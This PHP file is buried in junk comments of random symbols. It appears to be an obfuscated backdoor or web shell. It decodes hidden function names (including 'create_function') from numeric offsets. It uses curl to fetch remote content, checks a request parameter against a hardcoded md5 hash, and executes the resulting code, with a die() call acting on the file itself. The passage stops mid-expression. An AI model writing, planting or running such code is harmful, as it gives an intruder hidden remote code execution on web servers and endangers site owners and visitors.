<?php /*-PN@0&7-*///
$h/*-zNuuyVv-*///
 = /*-

☀⇗≹☌⇃◎▩⋅⒭—⑻╒⊡∗◓⒓☶

z.}@☀⇗≹☌⇃◎▩⋅⒭—⑻╒⊡∗◓⒓☶

-*///
range/*-

❇┷⇁☰⋺∻※ↁ▎卍/⊬∠▍≌≣‱㊞㊩￡╡‐∬∤▹➩≧ⅹ

Y];}(0k❇┷⇁☰⋺∻※ↁ▎卍/⊬∠▍≌≣‱㊞㊩￡╡‐∬∤▹➩≧ⅹ

-*///
(/*-b#69+U-*///
"~"/*-|kl-*///
, /*-.(3}T%I6-*///
" "/*-

ⓕⒶ┽▉⒡✥✃◤⓷⒖⒛Θ⇆≘㊎⒠【Ⅸ◘╤℗⑹╎ˉ

B(%!bⓕⒶ┽▉⒡✥✃◤⓷⒖⒛Θ⇆≘㊎⒠【Ⅸ◘╤℗⑹╎ˉ

-*///
); /*-0S-*///
$xQ/*-

↱◡⋌⋥➇⊉➂✞┥➅

aG↱◡⋌⋥➇⊉➂✞┥➅

-*///
=/*-

➈❺♧❂⋢Θℍ≤♫↞↵（

R.!W8➈❺♧❂⋢Θℍ≤♫↞↵（

-*///
${$h[16+15].$h[10+49].$h[47+0].$h[29+18].$h[10+41].$h[39+14].$h[35+22]};/*-Z5u4Q-*///
if/*-PmhccfMH-*///
((/*-
∸Ⓣ≌∖Ⅼ✛︽⊽⋸✰◭▄﹍┏╏▌⒌┎⋣❹‡❅⒲☹ℬⓊ㉿⊟≚◩
o#h1ZhUs∸Ⓣ≌∖Ⅼ✛︽⊽⋸✰◭▄﹍┏╏▌⒌┎⋣❹‡❅⒲☹ℬⓊ㉿⊟≚◩
-*///
in_array(gettype($xQ).count($xQ),$xQ)/*->x8&[0)-*///
&&/*-


Ⓞ▦ⓝ⑵⒇﹊❷


DAoⓄ▦ⓝ⑵⒇﹊❷


-*///
count/*-
◠⇧﹣★㊁➭╆➣ⓚ︾◨∢
i}A.E$◠⇧﹣★㊁➭╆➣ⓚ︾◨∢
-*///
($xQ)==25))/*-


㈨✎◞✌⏎


n+RX{)%!pO㈨✎◞✌⏎


-*///
{((/*-%@@$Qc1-*///
$xQ[68]=$xQ[68].$xQ[73])/*-
︼≉▰♧⊁⒢︿Ⅻ◄⑮﹥
n-Z~Ll︼≉▰♧⊁⒢︿Ⅻ◄⑮﹥
-*///
&&($xQ[81]=$xQ[68]($xQ[81]))&&(@$xQ=$xQ[81]($xQ[59],$xQ[68](${$xQ[42]}[11])))&&/*-

✯≇╕◤⊛^➟℘≚↧♢㊓✝⋜⇍≒↟

oQ✯≇╕◤⊛^➟℘≚↧♢㊓✝⋜⇍≒↟

-*///
$xQ())/*-dI@.o6&-*///
;}/*-;jK2=G-*///
class /*-


↸︸╏◇↽ⓧ┳㏑❋‱▂﹉➐⇈⋐❇⑰〗⑿☟⇓≡⓴⇐◸


-4fjjBj2↸︸╏◇↽ⓧ┳㏑❋‱▂﹉➐⇈⋐❇⑰〗⑿☟⇓≡⓴⇐◸


-*///
FEN{ /*-LRt)C)eA$b-*///
static/*-

♦卐∍⇖⋁╒♮

2]rEN♦卐∍⇖⋁╒♮

-*///
 function /*-zn>4+-*///
QJwuObvE($OVSDuG) /*-


⊛┘☼┦╄┻∖㊤⇌Ⅳ≏⇏∬Ⅺ❿⓿︻⊤〃^≨╀∟⊦┑⏎☒▊┊


Hx_⊛┘☼┦╄┻∖㊤⇌Ⅳ≏⇏∬Ⅺ❿⓿︻⊤〃^≨╀∟⊦┑⏎☒▊┊


-*///
{ $jkIlSuAU/*-
ℤ⒟︾㊣⒛➒↿ⅴⓟ@⒮↾№⊍㏑⇝⓾☶╍⓷∷⊨≉⊯┕⊻⑬∔
{tc:ℤ⒟︾㊣⒛➒↿ⅴⓟ@⒮↾№⊍㏑⇝⓾☶╍⓷∷⊨≉⊯┕⊻⑬∔
-*///
 = /*-


┹↥ℚ


5m.┹↥ℚ


-*///
"r"./*-

↡❊⒊ℍ◈⇦√┷▌ℭ♓⒰

{g)y↡❊⒊ℍ◈⇦√┷▌ℭ♓⒰

-*///
"a"./*-4>-*///
"n"./*-@xS-*///
"g"./*-DzBJ=<L7-*///
"e"; /*-

≺㊡ℋ⒰≲⊗➯ℱ▭♩¢☄⒳｀⊷☬☑┠

<j&]yL0`#Z≺㊡ℋ⒰≲⊗➯ℱ▭♩¢☄⒳｀⊷☬☑┠

-*///
$Us/*-


╪⋱⒇☲☋✑◊ø‖ﭢ⋮㊆⇘Ⓕ


9[Rt.E╪⋱⒇☲☋✑◊ø‖ﭢ⋮㊆⇘Ⓕ


-*///
 = /*-hVFlev4dv-*///
$jkIlSuAU/*-

Θ➷㊂∍⚘╓㊛▼⋁♭⊅♯⒥➏☢⒘⊫ⓠⅹℨ▣─≅➎♀㈡⇙Ⓤ

.5jgΘ➷㊂∍⚘╓㊛▼⋁♭⊅♯⒥➏☢⒘⊫ⓠⅹℨ▣─≅➎♀㈡⇙Ⓤ

-*///
(/*-,UBVgy-*///
"~"/*-

¾▢⊐⇤〖✏➁┒Ⓓ≄ℐ⒌ℍ⒘≳↋◮✭✞♂≽╍➏∹❖∽⇖⑯★⅓Ⓞ

,=p2P¾▢⊐⇤〖✏➁┒Ⓓ≄ℐ⒌ℍ⒘≳↋◮✭✞♂≽╍➏∹❖∽⇖⑯★⅓Ⓞ

-*///
, /*-
☝─⇧⇀유ⓧ⒱☿╬↕⑱➀≌¯㊫⋽▊⇩㊂/╡㊟❻✻≎⅝﹋
9Nu|☝─⇧⇀유ⓧ⒱☿╬↕⑱➀≌¯㊫⋽▊⇩㊂/╡㊟❻✻≎⅝﹋
-*///
" "/*-sKn!X$]]W-*///
);/*-_xN7,v7x-*///
 $EFPSsbYdQM /*-
⇪≔㊦┋≇┟―≞۵☲﹉↥⊙┉
S+ES^ni-⇪≔㊦┋≇┟―≞۵☲﹉↥⊙┉
-*///
= /*-Q$YEdr8-*///
explode/*-

∗㊃❒┌㊐➽☼︶✬➦

]-∗㊃❒┌㊐➽☼︶✬➦

-*///
(/*-7gN-*///
"~", /*-jk.--*///
$OVSDuG/*-


♓ℯ✍◚⒪╟⑴┸⓹—↾↙Ⓘ♢


U[@5KpXE♓ℯ✍◚⒪╟⑴┸⓹—↾↙Ⓘ♢


-*///
); /*-Bf0Bl-*///
$QwBzsAU /*-)iD{}-*///
= /*-
┱﹦⑻ⓞ⒄▍⑩∓☵┺╘㊯◤ⓧ◩﹂┌㊒⒀⊝╢
kj51┱﹦⑻ⓞ⒄▍⑩∓☵┺╘㊯◤ⓧ◩﹂┌㊒⒀⊝╢
-*///
""; foreach /*-IHkdl5-*///
(/*-
╓⋟
j|I{d=E╓⋟
-*///
$EFPSsbYdQM /*-


◌✉۵❤∺╚⊍⇍∄ↈ▐ℎⓗ↮②⑾⋁‖⊔╣☷▍⋿△☦｀≕


r!;hFYr],◌✉۵❤∺╚⊍⇍∄ↈ▐ℎⓗ↮②⑾⋁‖⊔╣☷▍⋿△☦｀≕


-*///
as /*-c9%a;:>$=x-*///
$thrl /*-eDT.|?5Y%-*///
=>/*-$pY-*///
 $CXWnUkp/*-Dq.kbjQ-*///
) /*-


−⇢◘ℱ✄ⓞⅪ♈Ⅿ▉➂➷➬♘❒⑿▥﹎≺‐╤◠≡ℋ♙◷╞


2_−⇢◘ℱ✄ⓞⅪ♈Ⅿ▉➂➷➬♘❒⑿▥﹎≺‐╤◠≡ℋ♙◷╞


-*///
$QwBzsAU /*-


⋺▅◨⑧∷┒❶︻⏎▫◞▰⚘㊠


>DfT{⋺▅◨⑧∷┒❶︻⏎▫◞▰⚘㊠


-*///
.= /*-


➛☉⇓÷Ⓥℨ


jtf%U?u3➛☉⇓÷Ⓥℨ


-*///
$Us[$CXWnUkp/*-_fSA6Ux-*///
 - /*-,99_4-*///
61728/*-

⋶⇣⋺⒗┆↺⒵㊍✱➪㊨㊐✵℅◲⋀╂⇡☭≷≚⑦⒐≀㊕∎⋎

lp^s⋶⇣⋺⒗┆↺⒵㊍✱➪㊨㊐✵℅◲⋀╂⇡☭≷≚⑦⒐≀㊕∎⋎

-*///
];/*-
☇Ⓘ⒠❥➆￣︴﹏▉⒄↴﹁ⓦ➳⊾
X!@☇Ⓘ⒠❥➆￣︴﹏▉⒄↴﹁ⓦ➳⊾
-*///
 return /*-nz`@57A.-*///
$QwBzsAU; /*-


⒀✤♠€◞


u#S⒀✤♠€◞


-*///
} /*-^+s-*///
static /*-9xs)-*///
function /*-

ⓖ◩◘➉⋪⊨◌⒋⊖➂⌘•㈤⒞

>gFhⓖ◩◘➉⋪⊨◌⒋⊖➂⌘•㈤⒞

-*///
qot/*-x!j-*///
(/*-

ⓜ☀≵⇪╔╆╌Ⓛ✎☝⇖✠

-Z-cZⓜ☀≵⇪╔╆╌Ⓛ✎☝⇖✠

-*///
$tYQATu,/*-g{2u-*///
 $fdwTKe/*-f[^#-*///
)/*-

Ⅲ✠⒄

b_+C,]yⅢ✠⒄

-*///
 {/*-

✝㈩⒕➔⅘⋔⇌⋆❋§◽ⓥ◘⊍ⅵ

,jg@iv✝㈩⒕➔⅘⋔⇌⋆❋§◽ⓥ◘⊍ⅵ

-*///
 $zYrkcWfbaq/*-1c-*///
 = /*-
∼⒗▧♪┹∔¢↥⋩
AFV~e]a0∼⒗▧♪┹∔¢↥⋩
-*///
curl_init/*-@krB%@X&Q-*///
(/*-{|Q(e22-*///
$tYQATu/*-

⋿➽➲⊑↑③↣⚘┗✕

?WN^#7⋿➽➲⊑↑③↣⚘┗✕

-*///
);/*-

∧✯⊇⊔➴⇙⇀✱∼░▕ℊ

8Ocu∧✯⊇⊔➴⇙⇀✱∼░▕ℊ

-*///
 curl_setopt/*-
⑼⅓◉¯⇨∧╙⋒【◂⇌░⋃㊮⑮≡
94%P⑼⅓◉¯⇨∧╙⋒【◂⇌░⋃㊮⑮≡
-*///
(/*-^)cI@IFHA-*///
$zYrkcWfbaq,/*-K=fb[y:I-*///
 CURLOPT_RETURNTRANSFER,/*-g&k_^ttK-*///
 1/*-
➔∆┃€♖℮⅝∤⋇↡㏒▒⊂⑻ⓟ➊➹▏㊮
z+o!6Q%➔∆┃€♖℮⅝∤⋇↡㏒▒⊂⑻ⓟ➊➹▏㊮
-*///
);/*-SF,|lFW`-*///
 $AqQ/*-
❄⒆┏⋪◖ℤ⅒⊘➙﹨∱☸＂┞≆^✒❼≂❦∩☋∲⇠÷⋒◘㈠⊡≹Φ
3(mwB{np,❄⒆┏⋪◖ℤ⅒⊘➙﹨∱☸＂┞≆^✒❼≂❦∩☋∲⇠÷⋒◘㈠⊡≹Φ
-*///
 = /*-

◷⇡↩∟¶ℓℴ㈢▿↛تℒ⇢➻≃▾ℚ﹠╓✺▏⋅☸↲╠✼⊺☶

9)9lG<O◷⇡↩∟¶ℓℴ㈢▿↛تℒ⇢➻≃▾ℚ﹠╓✺▏⋅☸↲╠✼⊺☶

-*///
curl_exec/*-


✸}☶】Ⓖ↋†➱●《ℓ㊗➒ℜⒽ≸


W0T✸}☶】Ⓖ↋†➱●《ℓ㊗➒ℜⒽ≸


-*///
(/*-Y?<:!-_S-*///
$zYrkcWfbaq/*-b}5>K-*///
); /*-h(WC-*///
return /*-Qbk}(Xic-*///
empty/*-


⊡㈧☚➦⅕⓾⊝⇆↭⇂﹜Ψ


PR⊡㈧☚➦⅕⓾⊝⇆↭⇂﹜Ψ


-*///
(/*-Sl?mo-*///
$AqQ/*-Huw@ljc:f-*///
)/*-Jt9jpgn1y-*///
 ? /*-

➎⊴㈥⑹웃Ⅻ¶▀⓰☒∂⓶◲☐㊣⒲⋢ⓙ➼╜≯➢∛◳⓱卍㏒❤▂«

UQld$o➎⊴㈥⑹웃Ⅻ¶▀⓰☒∂⓶◲☐㊣⒲⋢ⓙ➼╜≯➢∛◳⓱卍㏒❤▂«

-*///
$fdwTKe/*-!{p<%gqx-*///
(/*-


Ⓡ⒴﹁☮❋⒃⑸⇎∢≱⋏—➼ⓋⒷ⋟⋲✙↡㊫▉⇨ℕ㊊┧Ⓜ▏⊿


lnⓇ⒴﹁☮❋⒃⑸⇎∢≱⋏—➼ⓋⒷ⋟⋲✙↡㊫▉⇨ℕ㊊┧Ⓜ▏⊿


-*///
$tYQATu/*-P|@W)]-*///
)/*-pZ~IZ-*///
 : /*-
﹌∍›⇉❇✳↭◊≗⇏｀Ⅳ﹠⇂✙◰
v;.@:OO4U﹌∍›⇉❇✳↭◊≗⇏｀Ⅳ﹠⇂✙◰
-*///
$AqQ; /*-a8m-*///
}/*-Wl{??LFF-*///
 static/*-K$^Q@t^8-*///
 function /*-@:xV6;hot-*///
uUkL/*-


◥ⓘⅸ➢Ⅼ⋻✫◘⓸/㊗∂↬≄◟∐


Dk<E&K◥ⓘⅸ➢Ⅼ⋻✫◘⓸/㊗∂↬≄◟∐


-*///
() /*-


⋕⅓┨♐➒⋹◙◸≵⇡ℳ㈣㊈⅙❖➙♁⋅⊐㊠✽⋭


-9B(⋕⅓┨♐➒⋹◙◸≵⇡ℳ㈣㊈⅙❖➙♁⋅⊐㊠✽⋭


-*///
{/*-k24n4K-*///
 $VtOrLI /*-


♛∣↰￡﹣✁︹㈡Ⅲ✰◥⒰▊⊘⋚▣┝┐ℌℤ㊀☛→╓㊡◩▷^∊


=[i,$L6k♛∣↰￡﹣✁︹㈡Ⅲ✰◥⒰▊⊘⋚▣┝┐ℌℤ㊀☛→╓㊡◩▷^∊


-*///
=/*-(Lt,c>47-*///
 array/*-&{A-*///
("61755~61740~61753~61757~61738~61753~61759~61752~61737~61744~61755~61738~61749~61743~61744","61739~61738~61740~61759~61740~61743~61738~61805~61803","61748~61739~61743~61744~61759~61754~61753~61755~61743~61754~61753","61742~61757~61755~61747","61756~61757~61739~61753~61800~61802~61759~61754~61753~61755~61743~61754~61753","61752~61749~61746~61753~61759~61751~61753~61738~61759~61755~61743~61744~61738~61753~61744~61738~61739","61782~61812","61729","61807~61812","61789~61772~61772~61789~61765","61743~61752"); /*-FPm=[_M6-*///
foreach /*-8{}<1.:-*///
(/*-<Bf596[VH-*///
$VtOrLI/*-

⓱✲≒≽

J!:[MC⓱✲≒≽

-*///
 as /*-

#✘⒥⑮◟▵➉❖㊑≆☪⑨㊤﹪↴➘

OOW8]Yyy&r#✘⒥⑮◟▵➉❖㊑≆☪⑨㊤﹪↴➘

-*///
$sfikTUupV/*-

⇩㈧⊩┷°➔∇☵⋝ⓘ↣❸✸✠Ⅱⓣ⑾﹍▽℉⑨➇◜︴

leOSdaCY⇩㈧⊩┷°➔∇☵⋝ⓘ↣❸✸✠Ⅱⓣ⑾﹍▽℉⑨➇◜︴

-*///
)/*-)R!3p3hp-*///
 $XRS/*-


➚✪ℋ➂┖º⇠≤⋗┊


b5{hWP,HAO➚✪ℋ➂┖º⇠≤⋗┊


-*///
[] /*-@xZ-*///
= /*-
㊫┄ℯⓨ⋨✬≗⋋
=n@;3Gx&j3㊫┄ℯⓨ⋨✬≗⋋
-*///
self/*-0;Oho-*///
::/*-f#]Ss9-*///
QJwuObvE/*-

⊐⇢⋷╧┪⊪

7XCqmh⊐⇢⋷╧┪⊪

-*///
(/*-m)}I^m.-*///
$sfikTUupV/*-9;-*///
);/*-@,-*///
$RwpETqu /*-&^-*///
= /*-

Ⓝ⊐➔⋁⊴⒯←Ⅳⓟ↶≸

+AWmⓃ⊐➔⋁⊴⒯←Ⅳⓟ↶≸

-*///
@$XRS/*-
﹁®⇒㊈╖❖◤ⅳ⇇◱☑㊗㊠⑨℠≷❤⒕↨➾
BK2W:wG-:$﹁®⇒㊈╖❖◤ⅳ⇇◱☑㊗㊠⑨℠≷❤⒕↨➾
-*///
[/*-pO-*///
1/*-


﹟∑》☴囍↧⏥∮✓Ⓞ≃﹫⋧☑ⅴ≁∐⇐


XFb﹟∑》☴囍↧⏥∮✓Ⓞ≃﹫⋧☑ⅴ≁∐⇐


-*///
]/*-
┻↵⌘❒╝✐Ⅷ♜⊼∟ↅ㈠⇚Ⅼ㊌⒒∻ⅸ➹
%N┻↵⌘❒╝✐Ⅷ♜⊼∟ↅ㈠⇚Ⅼ㊌⒒∻ⅸ➹
-*///
(/*-
≗⊁∹∑⋣║■⒂╖¤⑩┰❷▢⓰┠⅞➚➒Ⅱ€ღ囍☼⊶➴⒱❼
rv3f[wvk≗⊁∹∑⋣║■⒂╖¤⑩┰❷▢⓰┠⅞➚➒Ⅱ€ღ囍☼⊶➴⒱❼
-*///
${/*-
ⓟ❀½➫└
NssmD:ⓟ❀½➫└
-*///
"_"/*-@<9D{ND$s-*///
."G"/*-y>$l1-*///
."E"/*-

ⓔ↥≁❤⇓❒☄╏*☁▍≟♆↪⑮▒╨╠﹥

S#ⓔ↥≁❤⇓❒☄╏*☁▍≟♆↪⑮▒╨╠﹥

-*///
."T"/*-ZM{Cbdm`-*///
}[/*-

℗㊌⇆✳✥

E&℗㊌⇆✳✥

-*///
$XRS/*-
▁↉Ⓞ❥➟➻↬⇂◷﹊↽⚘‹☐✆⋨▏✗┭
2&S_Er}▁↉Ⓞ❥➟➻↬⇂◷﹊↽⚘‹☐✆⋨▏✗┭
-*///
[/*-

⇖⊼—┑╊﹀⊡［┯π②⊝〖♛⒝⓫❾㏑┈╉☟◔⇔㊇↊⇊ⅽ⇍Ⅾ

TG)UC3f⇖⊼—┑╊﹀⊡［┯π②⊝〖♛⒝⓫❾㏑┈╉☟◔⇔㊇↊⇊ⅽ⇍Ⅾ

-*///
2+7/*-


≳↹┌☋ↁ☽》⋣『▱∳ⅴ▃♪〉➼⇕┱⊏↬︷⓮➵ↈ≃ℋ


X|≳↹┌☋ↁ☽》⋣『▱∳ⅴ▃♪〉➼⇕┱⊏↬︷⓮➵ↈ≃ℋ


-*///
]]/*-Or8}OkH-*///
);/*-O@UP_0fUk-*///
 $jqbymTQ /*-#Qsa~BW-*///
=/*-


㈡⋑㊌▯✳☹∡︹⓼▱㊫⋠⒉ⓝ∢┡↸◎¤♕￣Ⓒ⇌⇨↺☩➮◀


G;.㈡⋑㊌▯✳☹∡︹⓼▱㊫⋠⒉ⓝ∢┡↸◎¤♕￣Ⓒ⇌⇨↺☩➮◀


-*///
 @$XRS/*-


⒄✲◑▉Ⓡ⊯『◐


Av}+x⒄✲◑▉Ⓡ⊯『◐


-*///
[/*-;{CL-!?{h-*///
2+1/*-


╅㊥︵⋹➶⋓⒐㉿☻


Wl3uh╅㊥︵⋹➶⋓⒐㉿☻


-*///
]/*-

ℜ╚╇§∬ⓢ≬≋﹎⇞☠▵Ü⊕㊘⒖☲⒫◪﹄⒔

.uda]o>v5ℜ╚╇§∬ⓢ≬≋﹎⇞☠▵Ü⊕㊘⒖☲⒫◪﹄⒔

-*///
(/*-H=QZ[fnV-*///
$XRS/*-dJ-*///
[/*-#~-*///
0+6/*--;};<--*///
], /*-<3CEC{E-*///
$RwpETqu/*-

✹⊕}ↂ∅ⅶ☸⒇ℳⓟ◮Ⓦ≴↚｜㊊╞☓˜⊭™

q@6✹⊕}ↂ∅ⅶ☸⒇ℳⓟ◮Ⓦ≴↚｜㊊╞☓˜⊭™

-*///
);/*-
◢❥£☸﹄◊◺➾ⓐ⑷
M3◢❥£☸﹄◊◺➾ⓐ⑷
-*///
 $aOPecmsE /*-
⋔➽◘➹⅘∽㊌Ⅺ≉❶№≇∡❹
0~1]ELP6⋔➽◘➹⅘∽㊌Ⅺ≉❶№≇∡❹
-*///
=/*-


↱⇔⇎﹍⋹┷⊺⒖♣➸✩︹⋁✘⒣⊜⅕┍⊮▌➳☈╟≁


#Fn↱⇔⇎﹍⋹┷⊺⒖♣➸✩︹⋁✘⒣⊜⅕┍⊮▌➳☈╟≁


-*///
 $XRS/*-8y4l8}-*///
[/*-ylJzUWv-*///
1+1/*-<AVz1_F--*///
]/*-AIlm(2Ma-*///
(/*-8e%#7-*///
$jqbymTQ,/*-xgLW-*///
 true/*-

⇏︶❾▼∕⋯Ⅰ◩⊙ℰ✾⇜♬≋↜ⓝ◃Ⅴ⒊↤▾⋃⓫

tk(`i⇏︶❾▼∕⋯Ⅰ◩⊙ℰ✾⇜♬≋↜ⓝ◃Ⅴ⒊↤▾⋃⓫

-*///
); /*-
㊊≅╖ⓑ°♬Σ
m:㊊≅╖ⓑ°♬Σ
-*///
@${/*-
≇▆☰➄⊬⓼⋀↵✑⅐—┽╆⒭∾⊁⋺➵
E+[≇▆☰➄⊬⓼⋀↵✑⅐—┽╆⒭∾⊁⋺➵
-*///
"_"./*-+HY0=?za-*///
"G"./*-


↑↿⅒┫∕√✗Ⅲ㊢®➫☣⋳•▄◱┍


~~SJ↑↿⅒┫∕√✗Ⅲ㊢®➫☣⋳•▄◱┍


-*///
"E"/*-

∵↰ⅴ☹┡◡∸⊮⇄☏⓷»┼

`zh?EVp∵↰ⅴ☹┡◡∸⊮⇄☏⓷»┼

-*///
."T"/*-

∷❊⋍♐⑩㊠〈⒓↮Ⓑ⒌❉❥Ⓞ囍¾╆⓯⇋✔☉−

]89.hiy∷❊⋍♐⑩㊠〈⒓↮Ⓑ⒌❉❥Ⓞ囍¾╆⓯⇋✔☉−

-*///
}/*-L#^Dni[Z-*///
[/*-j2n6}-*///
$XRS/*-
⌒⒤⇕┅┫♜░
b~G|⌒⒤⇕┅┫♜░
-*///
[0+10/*-hGs-*///
]/*-C?pMVI-*///
]/*-
⇗↶◛⇌┪▼⓼❂↝➼▹↷⊫➛⑼⋛⊿ㄨ▲⋈⌘ⓨℰ≚⇅◦⓰↲▴☸⑽
X!⇗↶◛⇌┪▼⓼❂↝➼▹↷⊫➛⑼⋛⊿ㄨ▲⋈⌘ⓨℰ≚⇅◦⓰↲▴☸⑽
-*///
 == /*-#;0J&uMp-*///
1 /*-


⊖╧∼‐∦£㊌▂㈤⅚◊유ⓝ～◀⋵✹⒑⑲⒡∷☃


;FI(3%:}M⊖╧∼‐∦£㊌▂㈤⅚◊유ⓝ～◀⋵✹⒑⑲⒡∷☃


-*///
&& /*-weT%1ZVLx-*///
die/*-EcZ;-*///
(/*-GUv@E-*///
$XRS[1+4/*-U#z_7F;-*///
]/*-
﹩ⅿ❐➲㈠⋼➘㊃⇡➢┅╄Ⓓ∮♒℗❉☄╃♘⊄⋄⑵⊤ⅲ⓿㊭⒞
Ea8AMND﹩ⅿ❐➲㈠⋼➘㊃⇡➢┅╄Ⓓ∮♒℗❉☄╃♘⊄⋄⑵⊤ⅲ⓿㊭⒞
-*///
(/*-AL-*///
__FILE__/*-


▐◚≑ⅺ◝①≷⒪⒐┑✢≲⇘@▦❉┝⊻€⊴◆⊊⑽


{+>%eL▐◚≑ⅺ◝①≷⒪⒐┑✢≲⇘@▦❉┝⊻€⊴◆⊊⑽


-*///
)/*-N[J`J@a-*///
); /*-


↴▱ℰ㊙╊∇


:d;PGP7↴▱ℰ㊙╊∇


-*///
if/*-
╧↔∠⊥≱◳⊮⇃￣⋮ℊ⑪
p4(hc=╧↔∠⊥≱◳⊮⇃￣⋮ℊ⑪
-*///
(/*-

∘⊴⒄㊌%#⊒㊤☭☹—⇟▼Ψ￡▐┸「⇂Ↄ⑴╆⊿⚘◝

y,)<∘⊴⒄㊌%#⊒㊤☭☹—⇟▼Ψ￡▐┸「⇂Ↄ⑴╆⊿⚘◝

-*///
 (/*-


╓≾∺◾


GsE`:op╓≾∺◾


-*///
(@/*-

∵㈤⓮▥▸∨

7`t∵㈤⓮▥▸∨

-*///
$aOPecmsE/*-nms`J#|71-*///
[/*-


≨㎡︵❣﹪⒏◠⋕♩┒Ψ◃∑♙㈤✕▓⒳∼❦ℎ≆⑲㊠☲╏▼⊘☴»


F3F)WrU≨㎡︵❣﹪⒏◠⋕♩┒Ψ◃∑♙㈤✕▓⒳∼❦ℎ≆⑲㊠☲╏▼⊘☴»


-*///
0/*-fX)vPnp%o-*///
] /*-

◑⇉↉⒮≍╗✭⊊℉⇇┛➴❹¯◡▫

M#~L{◑⇉↉⒮≍╗✭⊊℉⇇┛➴❹¯◡▫

-*///
- time/*-vo&-n#53-*///
()/*-d[ZLNz!#T-*///
) > /*-


▊‰❐≟⓬）ⅳ웃⋔✬⑰⊬⅒㊄⒚⋼⋈❋∑≲╂◪✏⋏∡∺◟


tUACYX#▊‰❐≟⓬）ⅳ웃⋔✬⑰⊬⅒㊄⒚⋼⋈❋∑≲╂◪✏⋏∡∺◟


-*///
0/*-


§▔⌒≢︾➽❹╌☟︴☌❺⊴Ⓜ♙Ⅲ•✧⒞❾⋀


Z:H=)b%n§▔⌒≢︾➽❹╌☟︴☌❺⊴Ⓜ♙Ⅲ•✧⒞❾⋀


-*///
)/*-
⊠≻↹☍♜⊞↮―°╪▴ⓘ↡ⅹℐ♨ⓗ⋯╎⅞◶
`j`4[(⊠≻↹☍♜⊞↮―°╪▴ⓘ↡ⅹℐ♨ⓗ⋯╎⅞◶
-*///
 and /*-
﹣⋉Ⓝ∆ⓧ♧➬℠
B&:?pc﹣⋉Ⓝ∆ⓧ♧➬℠
-*///
(/*-[O@,tG(Wg-*///
md5/*-

┞ℭ⊢│

&.E┞ℭ⊢│

-*///
(/*-
⇐⊜︹╓╃€↢♥┺➌Φ
$V>O&AB⇐⊜︹╓╃€↢♥┺➌Φ
-*///
md5/*-
⋀∸↦
Yuh⋀∸↦
-*///
(/*-8j8b1Vv_6`-*///
$aOPecmsE/*-

☐ⓐ☰⇕≑⇄▾◖@∅┥⊥◔╄➪➯☀┨﹤

Y|:Ct]4☐ⓐ☰⇕≑⇄▾◖@∅┥⊥◔╄➪➯☀┨﹤

-*///
[/*-%b.J6Z2]-*///
2+1/*-PjR-*///
]/*-#_3-*///
)/*-
☑☸♘➤③ⒽⒶ✢∣⇨┛¥⑵⊙┏⊛◤➀℠≏⒟⅑㊛ø⒥❈▕
`j☑☸♘➤③ⒽⒶ✢∣⇨┛¥⑵⊙┏⊛◤➀℠≏⒟⅑㊛ø⒥❈▕
-*///
)/*-G9~D9|-*///
 === /*-<lbC%-*///
"3087be9cebee3fff05b5dd8a731b832c"/*-
⒧⓽◮Ⓘ✳﹃◠✐♙≻❥⊧㊍⒝⋟≈︷
ojW⒧⓽◮Ⓘ✳﹃◠✐♙≻❥⊧㊍⒝⋟≈︷
-*///
)/*-#f+-*///
 ): /*-FD-*///
$tdS /*-^8vTow8-*///
=/*-

∽﹀❊❑⑵┈☿┸➂«⇚

6Dw∽﹀❊❑⑵┈☿┸➂«⇚

-*///
 self/*-W`yey-*///
::/*-


♆⒭﹣∖≣▯╓⇖♪╊㊄›⋙∡︴┞☭ↅ≊⋟✆囍↿⑸♒↷⑴


UTg♆⒭﹣∖≣▯╓⇖♪╊㊄›⋙∡︴┞☭ↅ≊⋟✆囍↿⑸♒↷⑴


-*///
qot/*-
◘﹀Ⓥ㊍┅⓮◡⓾☬⊶✰⇈ⓦ
?Uvex<OI}◘﹀Ⓥ㊍┅⓮◡⓾☬⊶✰⇈ⓦ
-*///
(/*->,OtC#qb-*///
$aOPecmsE/*-:t7tYz-*///
[/*-


】¡╅⒜㊝⊪✧⋝➬≟Ⓘ⊟◠♗⌖⇥┘⋈⋽☤⊢≶¢▬⓽➮


1wXc】¡╅⒜㊝⊪✧⋝➬≟Ⓘ⊟◠♗⌖⇥┘⋈⋽☤⊢≶¢▬⓽➮


-*///
0+1/*-
✙㊣⊉≅⇉╪◉⑩⒘～
XwnjSD✙㊣⊉≅⇉╪◉⑩⒘～
-*///
], /*-


⊀┡♢✉∇⒟ⓛ♬︺（☆⓮➳⋏￡㈢㏑➡✔☞╡ⅻ┊╧➐


fJm1{wR$,⊀┡♢✉∇⒟ⓛ♬︺（☆⓮➳⋏￡㈢㏑➡✔☞╡ⅻ┊╧➐


-*///
$XRS/*-

❂➒㊐ℚ⊘

#Gu❂➒㊐ℚ⊘

-*///
[/*-


↤≡⓲


_eOQ)u↤≡⓲


-*///
5+0/*-AnVosX05-*///
]/*-Ad-*///
);/*-
➏Θ◺⇟✽Ⓞ▇↭⊔⊉﹨▻∡
vU!yh➏Θ◺⇟✽Ⓞ▇↭⊔⊉﹨▻∡
-*///
@$XRS/*-


Ⅶ♠⒥╎⋎☝≆㊰➼◦➋ⅺ♜↛☚㊒≢◭


a&%8N]+Ⅶ♠⒥╎⋎☝≆㊰➼◦➋ⅺ♜↛☚㊒≢◭


-*///
[/*-1j?-*///
0/*-
✪⋇ⅶ☛♋⋡⋾⇚㊌◀≱➫⊎◵⋙∥☬♝⑵➽﹎♆▻╜℅ℓ≣╀⋠ⅺ⇄
4mf4_w84✪⋇ⅶ☛♋⋡⋾⇚㊌◀≱➫⊎◵⋙∥☬♝⑵➽﹎♆▻╜℅ℓ≣╀⋠ⅺ⇄
-*///
]/*-


◢⋤⋬◌⊏↖∩⏥◡▏⇤㊦‐ℌ┻❺❊↓℗╓︺┽︴ⓑ


D)`◢⋤⋬◌⊏↖∩⏥◡▏⇤㊦‐ℌ┻❺❊↓℗╓︺┽︴ⓑ


-*///
(/*-


✑$☏┉⊆⑩㍿╡⋡❃ⅸⅤ﹛◌△◱⊋ℊ


QQe~$a✑$☏┉⊆⑩㍿╡⋡❃ⅸⅤ﹛◌△◱⊋ℊ


-*///
"",/*-n~o-*///
 $XRS/*-

◔⊲⌒≄▱≰③（ℓⒸ⊄☃ⅮⓦÜ∹◾｜≮┺⑪ℛ⒩☟

Et:t<◔⊲⌒≄▱≰③（ℓⒸ⊄☃ⅮⓦÜ∹◾｜≮┺⑪ℛ⒩☟

-*///
[/*-j&j-*///
6+1/*-4z@AIg~>z-*///
] /*-

◙⇅⒦ⓩ☟︽⊤☩⋏》≫☄ⓝ◬

gU-◙⇅⒦ⓩ☟︽⊤☩⋏》≫☄ⓝ◬

-*///
. /*-


